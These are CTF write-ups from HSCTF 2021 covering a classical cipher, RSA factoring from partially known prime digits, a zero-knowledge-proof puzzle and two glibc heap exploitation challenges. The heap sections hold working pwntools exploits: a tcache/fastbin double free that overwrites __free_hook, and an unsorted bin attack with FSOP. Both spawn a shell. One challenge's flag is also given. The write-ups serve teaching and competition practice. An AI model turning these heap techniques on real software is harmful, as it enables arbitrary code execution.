# HSCTF 2021 Writeups from tjcsc ## bucephala-albeola Here's a list of observations, made in approximately this order: - the key is cycled and applied per character, as `a` and `aa` return the same thing - the result is deterministic throughout a connection - only letters are accepted, and case does not matter - `i` and `j` do the same thing, suggesting a polybius square - each letter applies some shift, and subtracting the minimum from each shift amount and sorting gives the following (1), further suggesting some kind of grid ``` [0, 1, 2, 3, 4, 10, 11, 12, 13, 14, 20, 21, 22, 23, 23, 24, 30, 31, 32, 33, 34, 40, 41, 42, 43, 44] ``` - taking the list of numbers produced by the smallest shift and again subtracting the minimum from each number also produced a list (2) with numbers like above - replacing each number in list (2) with the letter they correspond to from list (1) produces `floccjnaucjnjhjljpjljfjcatjon` - `i` and `j` are the same so the flag is `floccinaucinihilipilification` ```python= from pwn import remote import string r = remote('bucephala-albeola.hsc.tf', 1337) encs = {} for k in string.ascii_lowercase: r.sendlineafter('key: ', k) r.recvuntil('enc(flag,key): ') encs[k] = list(map(int, r.recvline().strip().split())) r.close() _, m = min((v[0], k) for k, v in encs.items()) trans = {v[0] - encs[m][0]: k for k, v in encs.items()} mm = min(encs[m]) print(''.join(trans[i-mm] for i in encs[m])) ``` ## house-of-sice We can make up to 16 allocations, and the size is not controlled. We can, however, choose to use `calloc` instead of `malloc` one time. This may be helpful because `calloc` uses `_int_malloc` rather than `__libc_malloc` (which handles tcache) so `calloc` will not take chunks from the tcache. We are given libc 2.31 which includes the tcache key double free check. However, this check only runs if the tcache key is set, which is not the case for a chunk not in tcache. If we free a chunk into the fastbin *first*, then free it into the tcache, we will have a double free that does not abort the program. First, make 9 chunks and free 8 of them. The first 7 will go into the tcache while the 8th goes into the fastbin (the last one is to prevent consolidation with the top). ```python for _ in range(9): purchase(1, 69) for k in range(8): sell(k) ``` Next, allocate once to take a chunk out of the tcache and then free the 8th (7 index) chunk again to put it into the tcache. ```python purchase(1, 69) sell(7) ``` Now we can use the second type of deet to take the fastbin chunk out and write to its `fd`. Then, making two more regular allocations gives us arbitrary write. Writing `system` to `__free_hook` and freeing a chunk with `/bin/sh` in it gives us a shell. ```python purchase(2, libc.sym['__free_hook']) purchase(1, u64(b'/bin/sh\x00')) purchase(1, libc.sym['system']) sell(11) r.clean() r.interactive() ``` ## regulus-calendula We get to guess for a hex digit in `p` and `q` eight times, which is equivalent to roughly half of the bits in each factor if we don't guess the same digits. After some research, we found a [paper](http://souravsengupta.com/publications/2010_africacrypt.pdf) that we implemented. Essentially, it is a tree search starting from the lowest bit position. A naïve search would brute force all 8192 bits by branching 4 times at each position, but using the value of the public modulus n improves this to just 2 branches. In addition, knowing the bit value of one of the primes at a position allows the tree to branch only 1 time, and knowing both allows the entire subtree to be pruned if it is invalid. These improvements make the search much more feasible, but it was still impossible because we were missing far too many bits (bit positions that were unknown in both factors) and there were also many long runs of consecutive unknown bits. After some thinking, we realized that we had neglected to consider the fact that the remaining unknown bits could *not* be any of the numbers we guessed. To simplify the implementation, we guessed all the odd digits (which also guarantees that the bottom nybble is guessed, since the primes must be odd), which meant that all the remaining nybbles were even and had a low bit of 0. This only gave us 25% less missing bits, but it guaranteed that there would be no consecutive run of more than three unknown bits, allowing invalid subtrees to be pruned much more quickly. ```python import sys sys.setrecursionlimit(10000) from pwn import remote, args from subprocess import check_output bits = 4096 if args.LOCAL: r = remote('localhost', 6969) else: r = remote('regulus-calendula.hsc.tf', 1337) r.recvuntil('kctf-pow) solve ') r.sendline(check_output(['./power', r.recvline().decode().strip()])) r.sendline('2') r.recvuntil('n = ') n = int(r.recvline()) r.recvuntil('e = ') e = int(r.recvline()) p = [-1]*(bits//4) q = [-1]*(bits//4) for pi, prime in enumerate((p, q)): for k in range(1, 16, 2): r.sendline('4') r.recvuntil('Make a guess') r.recvuntil(': ') r.sendline(f'{k:x}'*(bits//4)) result = r.recvline().decode().strip() for i, bit in enumerate(result): if bit == '1': prime[i] = k def nybble2bits(nybble): assert nybble < 16 if nybble == -1: return [-1, -1, -1, 0] # bottom bit must be 0 since we guessed all the odds else: return list(map(int, f'{nybble:04b}')) p = [bit for x in p for bit in nybble2bits(x)][::-1] q = [bit for x in q for bit in nybble2bits(x)][::-1] print(f'n = {n}') print(f'p = {p}') print(f'q = {q}') print(sum(a==-1 and b==-1 for a, b in zip(p, q))) def append(bit, num, idx): return num | (bit << idx) def dfs(idx, pb, qb): # idx is i, pb is p_{i-1}, qb is q_{i-1} if idx == len(p): if pb*qb == n: return pb, qb return None # p[idx] ^ q[idx] == target target = ((n - pb*qb)>>idx)&1 # we know both bits, let's check if p[idx] != -1 and q[idx] != -1: if p[idx] ^ q[idx] == target: # good! continue return dfs(idx+1, append(p[idx], pb, idx), append(q[idx], qb, idx)) else: # no! prune the entire subtree return None # we know this prime but not the other if p[idx] != -1: return dfs(idx+1, append(p[idx], pb, idx), append(target ^ p[idx], qb, idx)) if q[idx] != -1: return dfs(idx+1, append(target ^ q[idx], pb, idx), append(q[idx], qb, idx)) # last resort, recur with both return dfs(idx+1, append(0, pb, idx), append(target ^ 0, qb, idx)) or \ dfs(idx+1, append(1, pb, idx), append(target ^ 1, qb, idx)) p, q = dfs(1, 1, 1) r.recvuntil('guesses left') r.sendline('3') print(p, q) r.sendline(str(pow(e, -1, (p-1)*(q-1)))) r.interactive() ``` ## use-after-freedom This challenge has a pretty strange way of checking for memory corruption. On every loop, the program checks if any heap pointers are less than `start` or greater than `end`, exiting the program if there are any. `start` is set to the beginning of the heap by allocating and freeing once at the beginning of the program, and `end` is set to 0x600000000000, so getting `malloc` to return pointers in libc or in the binary memory is out of the question. Even though we can't get arbitrary write, there are several attacks that give us a somewhat controlled write directly without returning bad pointers from `malloc`. We are allowed to allocate any size up to 0x10000, which is quite large—basically any type of chunk we want. There is also trivial double free and use after free, as pointers are not set to NULL after freeing them. First, get a libc leak by making a chunk of unsorted size and freeing it. Viewing the free chunk will give us a libc address. ```python obtain(65536, 'anna') obtain(10, 'anna') lose(0) view(0) r.recvuntil('?') r.recvuntil('> ') libc.address = u64(r.recv(6).ljust(8, b'\x00')) - 0x3ebca0 log.info(hex(libc.address)) ``` Since we can edit a free unsorted bin chunk, we can use the unsorted bin attack to write the address of the unsorted bin anywhere. It is sometimes a good option to write this to `_IO_list_all`, but that would require putting a chunk in the correct bin so that `_chain` points to a chunk, which is difficult. Instead, we use the unsorted bin attack to write `global_max_fast`, which means chunks of any size are considered fastbins. From here, we can free a chunk of size `0x1430` to write a pointer to the chunk to `_IO_list_all`. Unfortunately, allocations after an unsorted bin attack are a bit tricky, so we'll have to make this `FILE` chunk *before* the attack. However, we need the libc leak from the first unsorted bin to make this chunk. Thus, we empty the unsorted bin by allocating the same size as the first, make our `FILE` chunk, then free the unsorted bin again to do the unsorted bin attack. Then, we can free our `FILE` chunk, editing it a bit to remove the extra pointers written to it. ```python obtain(65536, 'anna') obtain(0x1430, f) lose(2) edit(2, p64(libc.address + 0x3ebca0) + p64(libc.sym['global_max_fast'] - 16)) obtain(65536, 'anna') lose(3) edit(3, b'\x00'*0x18) ``` What are the contents of the `FILE` chunk, `f`? I originally thought that, since the libc is 2.27, we can use the `_IO_str_overflow` vtable check bypass. However, the version of libc provided has several features backported from newer libc versions, so this attack no longer works. Luckily, we can use the `_IO_wfile_sync` function, which I [have already done before](https://activities.tjhsst.edu/csc/writeups/tjcsc-winter-2020#fsop). However, this requires that we know the address of our chunk. We can get a heap leak by freeing our 2nd (1 index) chunk, then writing eight characters to it and viewing it to leak the tcache key (which thankfully was also backported). ```python lose(1) edit(1, b'A'*7 + b'|') view(1) r.recvuntil('AA|') hleek = u64(r.recv(6).ljust(8, b'\x00')) f_addr = hleek + 0x10270 log.info(hex(f_addr)) ``` The only extra thing to note is that the pointer written to `_IO_list_all` is the start of the chunk with the header, so we don't control the first 16 bytes. Fortunately, they are already appropriate values (`0` and `0x1440` for size). ```python f = ( p64(0) + p64(0) + p64(0) + p64(1) + p64(0)*11 + p64(libc.sym["_IO_stdfile_1_lock"]) # _lock + p64(0) + p64(f_addr + 0xa8) # codecvt pointer + p64(f_addr) # _wide_data + b"/bin/sh\x00" # codecvt + p64(0)*3 + p64(libc.sym["system"]) # codecvt_do_encoding + p64(0) + p64(libc.sym["_IO_wfile_jumps"] + 9*8) # vtable wfile_sync ) ``` Exiting the program calls `_IO_flush_all_lockp`, which calls `_IO_OVERFLOW` on our `FILE` chunk, which calls `_IO_wfile_sync` which eventually gives us a shell. ```python r.sendline('5') r.clean() r.interactive() ``` ## zkp I'm not entirely sure I understand the problem, but my script just checks a bunch of clauses and returns `false` if it receives a `[False, False, False]` and `true` if it does not within a certain number of tries. ```python= from pwn import * r = remote('zkp.hsc.tf', 1337) r.recvuntil('==\n') T = int(r.recvline()) log.info(f'{T} trials') for t in range(T): N = int(r.recvline()) M = int(r.recvline()) log.info(f'trial {t} with N={N} M={M}') lim = int(N*0.3) for n in range(lim): r.sendlineafter(': ', '1') truths = r.recvline().decode().strip() log.info(truths) if truths == '[False, False, False]': r.sendline('false') break if n == lim - 1: r.sendline('true') break r.sendline('next') r.interactive() ```